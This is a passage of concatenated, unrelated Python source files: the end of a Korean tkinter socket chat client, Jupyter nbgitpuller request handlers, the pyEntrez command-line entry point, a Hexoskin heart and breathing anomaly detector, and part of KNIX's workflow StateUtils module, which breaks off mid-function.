input_addr = tkinter.Entry(w_connect, textvariable=input_string, width=20)
input_addr.grid(row=0, column=1, padx=5, pady=5)
c_button = tkinter.Button(w_connect, text="접속하기",command=connect)
c_button.grid(row=0, column= 2, padx=5, pady=5)
width = 280
height = 45
screen_width = w_connect.winfo_screenwidth() #컴퓨터 해상도 계산
screen_height = w_connect.winfo_screenheight()
x = int((screen_width / 2) - (width / 2)) #컴퓨터 해상도 계산하여 가운데의 좌표값을 계산
y = int((screen_height / 2) - (height / 2))
w_connect.geometry('{}x{}+{}+{}'.format(width, height, x, y)) #창을 실행하였을때 실행할 위치를 지정
w_connect.mainloop()
# 채팅 구문
window = tkinter.Tk()
window.title("클라이언트")
cg_frame = tkinter.Frame(window)
scroll = tkinter.Scrollbar(cg_frame)
scroll.pack(side=tkinter.RIGHT, fill=tkinter.Y)
chat_list = tkinter.Listbox(cg_frame, height=15, width=50, yscrollcommand= scroll.set)
chat_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH, padx=5, pady=5)
cg_frame.pack()
input_msg = tkinter.StringVar()
inputbox = tkinter.Entry(window, textvariable=input_msg)
inputbox.bind("<Return>", send_message)
inputbox.pack(side=tkinter.LEFT, fill=tkinter.BOTH, expand=tkinter.YES, padx=5, pady=5)
send_button = tkinter.Button(window, text="전송",command=send_message)
send_button.pack(side=tkinter.RIGHT, fill=tkinter.X, padx=5, pady=5)
# 소켓 생성과 스레드 작동부분
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((IP, PORT))
th = Thread(target=recv_message, args=(sock,))
th.daemon = True
th.start()
watch = Viewer()
watch.run()
window.mainloop()
|
handlers.py
|
from tornado import gen, web, locks
import traceback
import urllib.parse
from notebook.base.handlers import IPythonHandler
import threading
import json
import os
from queue import Queue, Empty
import jinja2
from .pull import GitPuller
from .version import __version__
class SyncHandler(IPythonHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# We use this lock to make sure that only one sync operation
# can be happening at a time. Git doesn't like concurrent use!
if 'git_lock' not in self.settings:
self.settings['git_lock'] = locks.Lock()
@property
def git_lock(self):
return self.settings['git_lock']
@gen.coroutine
def emit(self, data):
if type(data) is not str:
serialized_data = json.dumps(data)
if 'output' in data:
self.log.info(data['output'].rstrip())
else:
serialized_data = data
self.log.info(data)
self.write('data: {}\n\n'.format(serialized_data))
yield self.flush()
@web.authenticated
@gen.coroutine
def get(self):
try:
yield self.git_lock.acquire(1)
except gen.TimeoutError:
self.emit({
'phase': 'error',
'message': 'Another git operations is currently running, try again in a few minutes'
})
return
try:
repo = self.get_argument('repo')
branch = self.get_argument('branch', None)
depth = self.get_argument('depth', None)
if depth:
depth = int(depth)
# The default working directory is the directory from which Jupyter
# server is launched, which is not the same as the root notebook
# directory assuming either --notebook-dir= is used from the
# command line or c.NotebookApp.notebook_dir is set in the jupyter
# configuration. This line assures that all repos are cloned
# relative to server_root_dir/<optional NBGITPULLER_PARENTPATH>,
# so that all repos are always in scope after cloning. Sometimes
# server_root_dir will include things like `~` and so the path
# must be expanded.
repo_parent_dir = os.path.join(os.path.expanduser(self.settings['server_root_dir']),
os.getenv('NBGITPULLER_PARENTPATH', ''))
repo_dir = os.path.join(repo_parent_dir, self.get_argument('targetpath', repo.split('/')[-1]))
# We gonna send out event streams!
self.set_header('content-type', 'text/event-stream')
self.set_header('cache-control', 'no-cache')
gp = GitPuller(repo, repo_dir, branch=branch, depth=depth, parent=self.settings['nbapp'])
q = Queue()
def pull():
try:
for line in gp.pull():
q.put_nowait(line)
# Sentinel when we're done
q.put_nowait(None)
except Exception as e:
q.put_nowait(e)
raise e
self.gp_thread = threading.Thread(target=pull)
self.gp_thread.start()
while True:
try:
progress = q.get_nowait()
except Empty:
yield gen.sleep(0.5)
continue
if progress is None:
break
if isinstance(progress, Exception):
self.emit({
'phase': 'error',
'message': str(progress),
'output': '\n'.join([
line.strip()
for line in traceback.format_exception(
type(progress), progress, progress.__traceback__
)
])
})
return
self.emit({'output': progress, 'phase': 'syncing'})
self.emit({'phase': 'finished'})
except Exception as e:
self.emit({
'phase': 'error',
'message': str(e),
'output': '\n'.join([
line.strip()
for line in traceback.format_exception(
type(e), e, e.__traceback__
)
])
})
finally:
self.git_lock.release()
class UIHandler(IPythonHandler):
def initialize(self):
super().initialize()
# FIXME: Is this really the best way to use jinja2 here?
# I can't seem to get the jinja2 env in the base handler to
# actually load templates from arbitrary paths ugh.
jinja2_env = self.settings['jinja2_env']
jinja2_env.loader = jinja2.ChoiceLoader([
jinja2_env.loader,
jinja2.FileSystemLoader(
os.path.join(os.path.dirname(__file__), 'templates')
)
])
@web.authenticated
@gen.coroutine
def get(self):
app_env = os.getenv('NBGITPULLER_APP', default='notebook')
repo = self.get_argument('repo')
branch = self.get_argument('branch', None)
depth = self.get_argument('depth', None)
urlPath = self.get_argument('urlpath', None) or \
self.get_argument('urlPath', None)
subPath = self.get_argument('subpath', None) or \
self.get_argument('subPath', '.')
app = self.get_argument('app', app_env)
parent_reldir = os.getenv('NBGITPULLER_PARENTPATH', '')
targetpath = self.get_argument('targetpath', None) or \
self.get_argument('targetPath', repo.split('/')[-1])
if urlPath:
path = urlPath
else:
path = os.path.join(parent_reldir, targetpath, subPath)
if app.lower() == 'lab':
path = 'lab/tree/' + path
elif path.lower().endswith('.ipynb'):
path = 'notebooks/' + path
else:
path = 'tree/' + path
self.write(
self.render_template(
'status.html',
repo=repo, branch=branch, path=path, depth=depth, targetpath=targetpath, version=__version__
))
self.flush()
class LegacyGitSyncRedirectHandler(IPythonHandler):
@web.authenticated
@gen.coroutine
def get(self):
new_url = '{base}git-pull?{query}'.format(
base=self.base_url,
query=self.request.query
)
self.redirect(new_url)
class LegacyInteractRedirectHandler(IPythonHandler):
@web.authenticated
@gen.coroutine
def get(self):
repo = self.get_argument('repo')
account = self.get_argument('account', 'data-8')
repo_url = 'https://github.com/{account}/{repo}'.format(account=account, repo=repo)
query = {
'repo': repo_url,
# branch & subPath are optional
'branch': self.get_argument('branch', 'gh-pages'),
'subPath': self.get_argument('path', '.')
}
new_url = '{base}git-pull?{query}'.format(
base=self.base_url,
query=urllib.parse.urlencode(query)
)
self.redirect(new_url)
|
cmdline.py
|
"""Main entry-point into pyEntrez, handling cmdline args and initializing prompt or TUI service.
When script is started the user will be checked against local user file; if they are a first-time
user they willwill go through a new user creation via the user_cred module and then return. If they
are a returning user their settings file will be loaded and a configargparser will be created. The
cmdline arguments are contained within the pyentrez.utils.variables module, where new arguments can
be added or removed. All settings in variables module are added to the users environment. Finally,
after parsing args either the prompt or TUI environment will initialize.
py-cui is extended in this module for the purpose of hooking into their resize-refresh activity
with a threaded monitor. This hook calls for all text containing widgets to update their text-
wrappers and to refresh.
"""
import threading
import time
# configparser Library
from pathlib import Path
from typing import Any, Optional, Tuple
import attr
import configargparse
# Py_CUI Library
import py_cui
from configargparse import ArgumentParser, argparse
# Logger
from loguru import logger
import pyentrez
from pyentrez import exceptions
from pyentrez.main import cmd_entrez, entrez_manager
from pyentrez.main import user_cred as uc
from pyentrez.utils import envars as ev
from pyentrez.utils import string_utils as su
from pyentrez.utils import variables as vl
cuxy: Tuple[int, int] = (5, 4)
# noinspection PyPep8Naming
class MyCUI(py_cui.PyCUI):
"""Extension of PyCUI for hooking into _refresh_height_width
PyCui has a built in resize handler from curses, which calls for all widgets to refresh their
terminal character height and width. There was no built-in functionality for resizing string
contained within those widgets. This class extension provides a hook by passing in the instanced
EntrezManager and calling for text_wrapping whenever _refresh_height_width is called.
Since py_cui checks and calls refreshes several times per second if the user is still resizing
their terminal, a thread is started to monitor for refresh calls, instead of calling each time.
The threaded call sets a progress bool to true that prevents new threads from being started
until this one is complete. The thread takes a short sleep, and then calls for EntrezManager
to call its refresh method with the latest height and width values.
Args:
num_rows (int): number of row
num_cols (int): number of cloumns
**kwargs (Dict[str, Any]: All other arguments required by parent.
Attributes:
lowermanager: Instance of EntrezManager
timing: bool to prevent multiple refresh monitor threads
"""
def __init__(self, num_rows, num_cols, **kwargs):
super().__init__(num_rows, num_cols, **kwargs)
self.lowermanager: Optional[Any] = None
self.thread: Optional[Any] = None
self.timing = False
# Start of pyEntrez-extended code ----------------------------
def start_time(self):
"""Only start a new thread once per time interval by setting a timing checkpoint."""
if not self.timing:
self.timing = True
self.thread = threading.Thread(target=self.timer, args=())
self.thread.start()
def timer(self):
"""On a new thread, when called sleep, and then call for EntrezManager to refresh."""
assert self.lowermanager is not None
time.sleep(0.05)
self.lowermanager.refresh_h_w()
self.timing = False
def _refresh_height_width(self, height, width):
"""Function that updates the height and width of the CUI based on terminal window size
Args:
height (int): Window height in terminal characters
width (int):Window width in terminal characters
"""
if self.lowermanager is not None:
self.start_time()
# End of pyEntrez-extended code ----------------------------
self._height = height
self._width = width
self._grid.update_grid_height_width(self._height, self._width)
for widget_id in self._widgets.keys():
self._widgets[widget_id].update_height_width()
if self._popup is not None:
self._popup.update_height_width()
@attr.s(slots=True)
class GetParser(object):
"""Create a parser using the settings defined in the variables module.
"""
path = attr.ib()
args = attr.ib()
@classmethod
def get_parser(cls) -> Any: # noqa: WPS213
"""Check if new user and then create argparser.
Function will run check_new() function to check if this is user's
first time using the script, and if it is a settings directory will
be created and a copy of the default config copied to it.
Additionally, the new user will be added to the core_config.yaml file,
with a path to the user's my_settings.yaml file.
ConfigArgParser allows for setting default config paths and will
check defaults>user_settings>envar.
User can also pass --INIT arg to create a new workspace.
Settings in pyentrez.utils.variables are formatted as follows:
APPSETTING = [
{
'args': ['-c', '--credentials'],
'kwargs': {
'action': 'store_true',
'default': False,
'help': 'Allow user to set DB credentials on application start.',
},
'setting': {'envar': <envar>, 'text': <text>}
},
...
Returns:
A tuple containing:
An instance of configargparser generated with arguments define in
pyentrez.utils.varaibles.
The os-agnostic Path to user's workspace directory.
"""
path = uc.check_new()
parse = configargparse.ArgParser(
default_config_files=[
path / 'my_settings.yaml',
],
formatter_class=argparse.MetavarTypeHelpFormatter,
add_env_var_help=False,
add_config_file_help=False,
auto_env_var_prefix=None,
description='''
pyEntrez can be run as a TUI or from the command line. Args that start
with "--" (eg. --version) can also be set in a config file. The config file
uses YAML syntax and must represent a YAML "mapping" (for details, see
http://learn.getgrav.org/advanced/yaml). If an arg is specified in more
than one place, then commandline values override config file values
which override defaults.
''')
menu = vl.get_settings()
for organization in menu.values():
for setting in organization:
if 'args' and 'kwargs' in setting.keys():
parse.add(*setting['args'], **setting['kwargs'])
args = parse.parse_args()
args = vars(args)
return cls(path, args)
@attr.s
class CLI(object):
"""CLI instance parses args and controls entry into the application.
Attributes:
self.version: version of pyentrez.
self.copyright: copyright string.
self.catastrophic_failure: whether or not a catastrophic_failure has been raised.
self.args: args passed from commandline.
"""
version: str = attr.ib(default=pyentrez.__version__)
copyright: str = attr.ib(default=pyentrez.__copyright__)
catastrophic_failure: bool = attr.ib(default=False)
args: Any = attr.ib(init=False)
def initialize(self):
"""Get a parser, set the args, and set Home path."""
parser = GetParser.get_parser()
self.args = parser.args
self.args['Home'] = parser.path
def run_pyentrez(self):
"""Handles application behavior based on parsed args.
If version is true it prints version info and then raises a normal SystemExit, which
allows application to shut down.
If INIT is true it takes the user through creation by calling UserCred's first_run.
Otherwise it calls envars to add all args to envars and then determines whether to start
pyentrez in TUI-mode or interactive cmd prompt.
"""
if self.args['version']:
print(f'pyentrez - {self.version}')
print(self.copyright)
raise SystemExit(self.catastrophic_failure)
elif self.args['INIT']:
logger.debug('User making a new workspace.')
uc.first_run()
else:
pyentrez.configure_logger(self.args['verbose'], self.args['output'])
ev.setenv(self.args)
if self.args['TUI'] == 'on':
logger.info('Starting in TUI mode')
self.starttui()
else:
logger.info('Starting in interactive cmd mode')
self.notui()
def notui(self) -> None:
"""Initialize application in commandline prompt mode."""
tui = cmd_entrez.CommandEntrez()
tui.start()
def starttui(self) -> None:
"""Initiate script in TUI mode.
Initialize pyCUI root and the EntrezManager. All config settings have been saved to envars
earlier in script. We use our extended myCUI class to hook into py_cui's resize refresh.
"""
root = MyCUI(cuxy[0], cuxy[1])
root.toggle_unicode_borders()
em = entrez_manager.EntrezManager(root) # noqa: F841
root.entrez_manager = em
root.start()
def clean_exit(self) -> None:
"""Provides a clean exit with logging and file closing."""
logger.info('Exiting pyEntrez.')
logger.info('-----------------------------------------------------')
raise SystemExit(self.catastrophic_failure)
def _run(self):
"""Abstraction to make sure application is only run if a CLI instance calls execute."""
self.initialize()
self.run_pyentrez()
@logger.catch
def execute(self) -> None:
"""Entry point into our script that instances a parser and then selects start behavior.
Instance a configargparser and check if user is new or existing. Parse the returned args
and determine if full initialization is taking place or if we are creating a new user or
returning version info. If initialization of application is requested, call for all setting
arguments to be loaded to envars and either start application in cmd-prompt or TUI mode.
Args that effect start behavior:
--INIT: Allows existing user to create a new workspace directory.
--version: Prints pyentrez version info and exits the application.
--TUI <on|off): Run application in TUI mode if 'on', or in cmd-prompt mode if 'off'
"""
try:
self._run()
except exceptions.CleanExit as exc:
self.clean_exit()
except KeyboardInterrupt as exc:
print('... stopped')
logger.critical(f'Caught keyboard interrupt from user:{exc}')
self.catastrophic_failure = True
except exceptions.ExecutionError as exc:
logger.critical(f'There was a critical error during execution of pyEntrez: {exc}')
print(f'There was a critical error during execution of pyEntrez: {exc}')
self.catastrophic_failure = True
except exceptions.EarlyQuit:
logger.critical('... stopped while processing files')
print("... stopped while processing files")
self.catastrophic_failure = True
|
anomaly_detector.py
|
from __future__ import division, print_function
from threading import Thread
import os
import ConfigParser
import logging
import numpy as np
import pandas as pd
from atrial_fibrillation import AtrialFibrillation
from ventricular_tachycardia import VentricularTachycardia
from apc_pvc_helper import APC_helper
from pvc_hamilton import PVC
from respiration_AD import RespiratoryAD
from sleep_AD import SleepAD
__author__ = "Dipankar Niranjan, https://github.com/Ras-al-Ghul"
# Logging config
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG)
class AnomalyDetector(object):
"""
implements methods to call various Anomaly Detection Algorithms
"""
def __init__(self):
self.config = ConfigParser.RawConfigParser()
dirname = os.path.dirname(os.path.realpath(__file__))
cfg_filename = os.path.join(dirname, 'anomaly_detector.cfg')
self.config.read(cfg_filename)
self.window_size =\
self.config.getint('Atrial Fibrillation', 'window_size')
self.vt_result = None
def af_anomaly_detect(self, rr_intervals, hr_quality_indices):
"""
executes the Atrial Fibrillation Anomaly detection
Input:
rr_intervals: a 2D pandas dataframe -
(refer rrinterval.txt from Hexoskin record)
first column named "hexoskin_timestamps" -
contains 'int' timestamps
second column named as "rr_int" -
contains 'double' interval data
hr_quality_indices: a 2D pandas dataframe -
(refer hr_quality.txt from Hexoskin record)
first column named "hexoskin_timestamps" -
containts 'int' timestamps
second column named as "quality_ind" -
contains 'int' quality indices,
with max value 127
Output:
returns:
if anomaly:
'dict' with follwing keys:
start_hexo_timestamp: an integer denoting timestamp of
the first record
end_hexo_timestamp: an integer denoting timestamp of
32/64/128 - last record
num_of_NEC: a small integer, higher the number,
more severe the anomaly here
data_reliability: a small integer, which denotes as a
percentage, the quality of the data
in this window
the higher the percentage, worse
the quality
window_size: a small integer, takes 32/64/128
as values
else:
None
Notes:
based on 'A Simple Method to Detect
Atrial Fibrillation Using RR Intervals'
by Jie Lian et. al.
Note the return value (if not 'None') and
check with the data_reliability and previous
data timestamps to set AFAlarmAttribute at
the health_monitor server
"""
if not (len(rr_intervals)) == self.window_size:
raise ValueError("window length of rr_intervals\
passed doesn't match config file")
if not (rr_intervals['hexoskin_timestamps'][0] >=
hr_quality_indices['hexoskin_timestamps'][0] and
rr_intervals['hexoskin_timestamps'][len(rr_intervals)-1] <=
hr_quality_indices
['hexoskin_timestamps'][len(hr_quality_indices)-1]):
pass
# raise ValueError("first rr_interval timestamp\
# and last rr_interval timestamp must lie within first \
# and last timestamp of hr_quality")
AF = AtrialFibrillation(rr_intervals, hr_quality_indices,
self.config)
return AF.get_anomaly()
def vt_anomaly_detect(self, ecg, rr_intervals,
rr_interval_status, prev_ampl):
"""
creates an object and calls the Ventricular Tachycardia
anomaly detection methods
Input:
ecg: a 2D pandas dataframe -
(refer ecg.txt from Hexoskin record)
first column named "hexoskin_timestamps" -
contains 'int' timestamps
second column named as "ecg_val" -
contains 'int' raw ecg data
rr_intervals: a 2D pandas dataframe -
(refer rrinterval.txt from Hexoskin record)
first column named "hexoskin_timestamps" -
contains 'int' timestamps
second column named as "rr_int" -
contains 'double' interval data
rr_intervals_status: a 2D pandas dataframe -
(refer rrintervalstatus from Hexoskin API)
first column named "hexoskin_timestamps" -
containts 'int' timestamps
second column named as "rr_status" -
contains 'int' quality indices.
Output:
sets:
vt_result: this is an attribute of an object of this
(Anomaly Detector) class. Its value can
be read from the caller method. Its value
is set to __zero_one_count which is
described next.
__zero_one_count - if it is the string True, it means
that analysis of next 6 seconds is
required
- if it is False, it means that next 6
second analysis is not required
- if it has an integer value then it
means that a VT event has been detected
and it has to be stored in the anomaly
database and of course next 6 second
analysis is required
Notes:
based on the following three papers:
'Ventricular Tachycardia/Fibrillation Detection
Algorithm for 24/7 Personal Wireless Heart Monitoring'
by Fokkenrood et. al.
'Real Time detection of ventricular fibrillation
and tachycardia' by Jekova et. al.
'Increase in Heart Rate Precedes Episodes of
Ventricular Tachycardia and Ventricular
Fibrillation in Patients with Implantahle
Cardioverter Defihrillators: Analysis of
Spontaneous Ventricular Tachycardia Database'
by Nemec et. al.
Refer to readme for more details
"""
__zero_one_count = True
VTobj = VentricularTachycardia(ecg, rr_intervals,
rr_interval_status, self.config)
further_analyze = VTobj.analyze_six_second()
# if initial analysis indicates that further analysis
# is not required
if not further_analyze:
__zero_one_count = False
self.vt_result = __zero_one_count
logging.info("Doing further analysis")
# perform the preprocessing
VTobj.signal_preprocess()
# call the DangerousHeartActivity detector
cur_ampl, stop_cur = VTobj.DHA_detect(prev_ampl)
# whatever be the results of the following stages,
# we necessarily have to analyze the next six second epoch
# if further analysis is not required
if stop_cur is True:
self.vt_result = __zero_one_count
# asystole detector
vtvfres = VTobj.asystole_detector(cur_ampl)
# to analyze next six second epoch
if vtvfres == 'VT/VF':
# A VT episode has been found
logging.info("%s" % str(vtvfres))
__zero_one_count = VTobj.zero_one_count
self.vt_result = __zero_one_count
else:
# not a VT episode
logging.info("%s" % str(vtvfres))
self.vt_result = __zero_one_count
def apc_pvc(self, init_timestamp):
"""
this is only for testing and reference purpose,
in actuality, create APC_helper object and call
directly - no need to create AD object for this
Input:
timestamp: the first timestamp
Output:
stores to the results dict of the APC class
Notes:
based on the following paper:
'Automatic detection of premature atrial
contractions in the electrocardiogram'
by Krasteva et. al.
Refer to readme for more details
"""
apcHelperObj = APC_helper()
apcHelperObj.populate_DS()
apcHelperObj.popluate_aux_structures(init_timestamp)
apcHelperObj.apcObj.absolute_arrhythmia()
def pvc_Hamilton(self, init_timestamp):
"""
this is only for testing and reference purpose,
in actuality, create PVC object and call
directly - no need to create AD object for this
Input:
timestamp: the first timestamp
Output:
stores to the results dict of the PVC class
Notes:
based on:
'Open Source ECG Analysis Software
Documentation'
by Patrick S. Hamilton
Refer to readme for more details
"""
pvcObj = PVC()
pvcObj.populate_data()
pvcObj.beat_classf_analyzer(init_timestamp)
def resp_AD(self, init_timestamp):
"""
this is only for testing and reference purpose,
in actuality, create RespiratoryAD object and call
directly - no need to create AD object for this
Input:
timestamp: the first timestamp
Output:
stores to the results dict of the RespiratoryAD class
Notes:
based on:
'http://wps.prenhall.com/wps/media/objects\
/2791/2858109/toolbox/Box15_1.pdf'
Refer to readme for more details
"""
respObj = RespiratoryAD(self.config, init_timestamp)
th1 = Thread(target=respObj.populate_DS, args=[])
th1.start()
th1.join()
th2 = Thread(target=respObj.tidal_volume_anomaly, args=[])
th2.start()
th3 = Thread(target=respObj.minute_ventilation_anomaly, args=[])
th3.start()
th4 = Thread(target=respObj.resp_variation, args=[])
th4.start()
th5 = Thread(target=respObj.resp_classf, args=[])
th5.start()
th6 = Thread(target=respObj.delete_DS, args=[])
th6.start()
def sleep_AD(self):
"""
this is only for testing and reference purpose,
in actuality, create SleepAD object and call
directly - no need to create AD object for this
Input:
None
Output:
stores to the anomaly_dict of the SleepAD class
Notes:
based on:
'https://www.sleepcycle.com/how-it-works/'
'http://blog.doctoroz.com/oz-experts/calculating-your-
perfect-bedtime-and-sleep-efficiency'
'https://api.hexoskin.com/docs/resource/sleepphase/'
'https://api.hexoskin.com/docs/resource/sleepposition/''
'https://api.hexoskin.com/docs/resource/metric/'
Refer to readme for more details
"""
SleepObj = SleepAD()
SleepObj.populate_DS()
SleepObj.get_metrics()
SleepObj.calc_woke_up_count()
SleepObj.get_possible_anomaly()
def main():
AD = AnomalyDetector()
rr_intervals = (pd.read_csv('rrinterval.txt',
sep="\t",
nrows=AD.config.getint('Atrial Fibrillation',
'window_size'),
dtype={"hexoskin_timestamps": np.int64,
"rr_int": np.float64},
header=None,
names=["hexoskin_timestamps", "rr_int"]))
hr_quality_indices = (pd.read_csv('hr_quality.txt',
sep="\t",
nrows=AD.config.
getint('Atrial Fibrillation',
'window_size')-8,
dtype={"hexoskin_timestamps": np.int64,
"quality_ind": np.int32},
header=None,
names=["hexoskin_timestamps",
"quality_ind"]))
# call the Atrial Fibrillation anomaly detection method
logging.info("%s" %
str(AD.af_anomaly_detect(rr_intervals, hr_quality_indices)))
ecg = (pd.read_csv('ecg.txt',
sep="\t",
nrows=256*6,
dtype={"hexoskin_timestamps": np.int64,
"ecg_val": np.int32},
header=None,
names=["hexoskin_timestamps", "ecg_val"]))
"""
for testing, ensure that only the relevant timestamped
rr_intervals are present in rrinterval.txt as it reads
a preset 7 rows
"""
rr_intervals = (pd.read_csv('rrinterval.txt',
sep="\t",
nrows=7,
dtype={"hexoskin_timestamps": np.int64,
"rr_int": np.float64},
header=None,
names=["hexoskin_timestamps", "rr_int"]))
"""
for testing, ensure that only the relevant timestamped
rr_status are present in rr_interval_status.txt as it
reads a preset 7 rows
"""
rr_interval_status = (pd.read_csv('rr_interval_status.txt',
sep="\t",
nrows=7,
dtype={"hexoskin_timestamps": np.int64,
"rr_status": np.int32},
header=None,
names=["hexoskin_timestamps",
"rr_status"]))
# call the Ventricular Tachycardia anomaly detection method
AD.vt_anomaly_detect(ecg, rr_intervals, rr_interval_status, 1400)
AD.apc_pvc(383021266184)
AD.pvc_Hamilton(383021266184)
AD.resp_AD(383021140185)
AD.sleep_AD()
if __name__ == '__main__':
main()
|
StateUtils.py
|
# Copyright 2020 The KNIX Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import copy
from datetime import datetime
import json
import socket
import time
import threading
import anytree
from thriftpy2.transport import TFramedTransportFactory, TServerSocket
from thriftpy2.protocol import TCompactProtocolFactory
from thriftpy2.server import TSimpleServer
from thriftpy2.thrift import TProcessor
from ujsonpath import parse, tokenize
import py3utils
from DataLayerClient import DataLayerClient
class StateUtils:
defaultStateType = 'Task_SAND'
taskStateType = 'Task'
choiceStateType = 'Choice'
passStateType = 'Pass'
succeedStateType = 'Succeed'
failStateType = 'Fail'
waitStateType = 'Wait'
parallelStateType = 'Parallel'
mapStateType = 'Map'
mapFunctionOutput = {}
def __init__(self, functionstatetype=defaultStateType, functionstatename='', functionstateinfo='{}', functionruntime="", logger=None, workflowid=None, sandboxid=None, functiontopic=None, datalayer=None, storage_userid=None, internal_endpoint=None):
self.operators = ['And', 'BooleanEquals', 'Not', 'NumericEquals', 'NumericGreaterThan', 'NumericGreaterThanEquals',\
'NumericLessThan', 'NumericLessThanEquals', 'Or', 'StringEquals', 'StringGreaterThan',\
'StringGreaterThanEquals', 'StringLessThan', 'StringLessThanEquals', 'TimestampEquals', 'TimestampGreaterThan',\
'TimestampGreaterThanEquals', 'TimestampLessThan', 'TimestampLessThanEquals']
self.operators_python = ['and', '==', 'not', '==', '>', '>=', '<', '<=', 'or', '==', '>', '>=', '<', '<=', '==', '>', '>=', '<', '<=']
self.operators_set = set(self.operators)
self.asl_errors = ("States.ALL", "States.Timeout", "States.TaskFailed", "States.Permissions", "States.ResultPathMatchFailure", "States.BranchFailed", "States.NoChoiceMatched")
self.nodelist = []
self.parsed_trees = []
self.default_next_choice = []
self.input_path_dict = {}
self.items_path_dict = {}
self.result_path_dict = {}
self.output_path_dict = {}
self.parameters_dict = {}
self.functionstatetype = functionstatetype
self.functionstatename = functionstatename
self.functionstateinfo = functionstateinfo
self.functiontopic = functiontopic
self._datalayer = datalayer
self._storage_userid = storage_userid
self._internal_endpoint = internal_endpoint
self._function_runtime = functionruntime
if self._function_runtime == "java":
# if java, this is the address we'll send requests to be handled
self._java_handler_address = "/tmp/java_handler_" + self.functionstatename + ".uds"
self.parsedfunctionstateinfo = {}
self.workflowid = workflowid
self.sandboxid = sandboxid
self.choiceNext = ''
self.mapStateCounter = 0
self.evaluateCounter = 0
self.catcher_list = []
self.retry_list = []
self._logger = logger
self.parse_function_state_info()
self.function_output_batch_list = []
self.tobeProcessedlater = []
self.outputMapStatebatch = []
self.mapPartialResult = {}
def call_counter(func):
def helper(*args, **kwargs):
helper.calls += 1
return func(*args, **kwargs)
helper.calls = 0
helper.__name__= func.__name__
return helper
# find target next for error in catcher list
def find_cat_data(self, err, cat_list):
cat_result = "$" # default
cat_next = [] # default
for cat in cat_list:
if "ErrorEquals" in cat and (str(err) in cat["ErrorEquals"] or err.__class__.__name__ in cat["ErrorEquals"]):
cat_next = cat['Next']
if "ResultPath" in cat:
cat_result = cat['ResultPath']
return cat_next, cat_result
def find_ret_data(self, err, ret_list):
ret_max_attempts = 1 # default
ret_interval_seconds = 1 # default
ret_backoff_rate = 1.0 # default
for ret in ret_list:
if err in ret['ErrorEquals'] or err.__class__.__name__ in ret['ErrorEquals']:
if "MaxAttempts" in list(ret.keys()):
ret_max_attempts = ret['MaxAttempts']
if "IntervalSeconds" in list(ret.keys()):
ret_interval_seconds = ret['IntervalSeconds']
if "BackoffRate" in list(ret.keys()):
ret_backoff_rate = ret['BackoffRate']
return ret_max_attempts, ret_interval_seconds, ret_backoff_rate
def isMapState(self):
return self.functionstatetype == StateUtils.mapStateType
def isTaskState(self):
return self.functionstatetype == StateUtils.taskStateType or self.functionstatetype == StateUtils.defaultStateType
def applyParameters(self, raw_state_input):
#2c. Apply Parameters, if available and applicable (The Parameters field is used in Map to select values in the input)
# in = raw_state_input
# if Parameters:
# in = raw_state_input[ItemsPath]
#
try:
function_input = raw_state_input
self._logger.debug("inside applyParameters: " + str(self.parameters_dict) + ", raw_state_input: " + str(raw_state_input))
if self.parameters_dict:
function_input = self.process_parameters(self.parameters_dict, function_input)
return function_input
except Exception:
raise Exception("Parameters processing exception")
def applyItemsPath(self, raw_state_input):
#2a. Apply ItemsPath, if available and applicable (The ItemsPath field is used in Map to select an array in the input)
# in = raw_state_input
# if ItemsPath:
# in = raw_state_input[ItemsPath]
#
try:
function_input = raw_state_input
if self.items_path_dict and 'ItemsPath' in self.items_path_dict:
function_input = self.process_items_path(self.items_path_dict, function_input)
return function_input
except Exception:
raise Exception("Items path processing exception")
def applyInputPath(self, raw_state_input):
#2. Apply InputPath, if available (Extract function_input from raw_state_input)
# in = raw_state_input
# if InputPath:
# in = raw_state_input[InputPath]
#
try:
function_input = raw_state_input
if self.input_path_dict and 'InputPath' in self.input_path_dict:
function_input = self.process_input_path(self.input_path_dict, function_input)
return function_input
except Exception:
raise Exception("Input path processing exception")
# send a request to the java worker and get the result
def _send_java_request(self, java_input, java_output, api_server, server_socket):
# get a connection to the java worker
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# send the request
max_num_tries = 10
num_tries = 0
trying = True
has_error = False
while trying:
try:
sock.connect(self._java_handler_address)
trying = False
except socket.error as msg:
num_tries += 1
if num_tries > max_num_tries:
self._logger.debug("cannot open connection to java worker: %s", msg)
trying = False
has_error = True
else:
self._logger.debug("will retry connection to java worker...")
time.sleep(0.05*num_tries)
if not has_error:
try:
sock.sendall(java_input.encode())
sock.shutdown(socket.SHUT_WR)
# receive the response
chunks = []
while True:
data = sock.recv(4096)
if not data:
sock.close()
break
chunks.append(data.decode())
output_data = "".join(chunks)
self._logger.debug("received output_data: " + output_data)
try:
output_data = json.loads(output_data)
if not output_data["hasError"]:
java_output["functionResult"] = output_data["functionResult"]
java_output["hasError"] = False
java_output["errorType"] = ""
java_output["errorTrace"] = ""
else:
java_output["hasError"] = output_data["hasError"]
java_output["errorType"] = output_data["errorType"]
java_output["errorTrace"] = output_data["errorTrace"]
except Exception as exc:
self._logger.debug("Problem in received output_data: " + output_data)
pass
# close the api server in the main thread, so that we can continue with publishing the output
api_server.close()
server_socket.close()
except socket.error as msg:
self._logger.debug("cannot send request to java worker: %s", msg)
#os._exit(1)
def _exec_function(self, runtime, exec_arguments, sapi):
if runtime == "python 3.6":
func = exec_arguments["function"]
args = exec_arguments["function_input"]
function_output = func(args, sapi)
elif runtime == "java":
# open the API server for this request
api_uds = exec_arguments["api_uds"]
thriftAPIService = exec_arguments["thriftAPIService"]
java_input = exec_arguments["function_input"]
processor = TProcessor(thriftAPIService, sapi)
server_socket = TServerSocket(unix_socket=api_uds, client_timeout=None)
# no need for any other type of server; there will only be a single client: the java function instance
api_server = TSimpleServer(processor, server_socket,
iprot_factory=TCompactProtocolFactory(),
itrans_factory=TFramedTransportFactory())
self._logger.debug("API server at: " + api_uds)
self._logger.debug("starting with java_input: " + java_input)
# access to the output for the thread via an object
java_output = {}
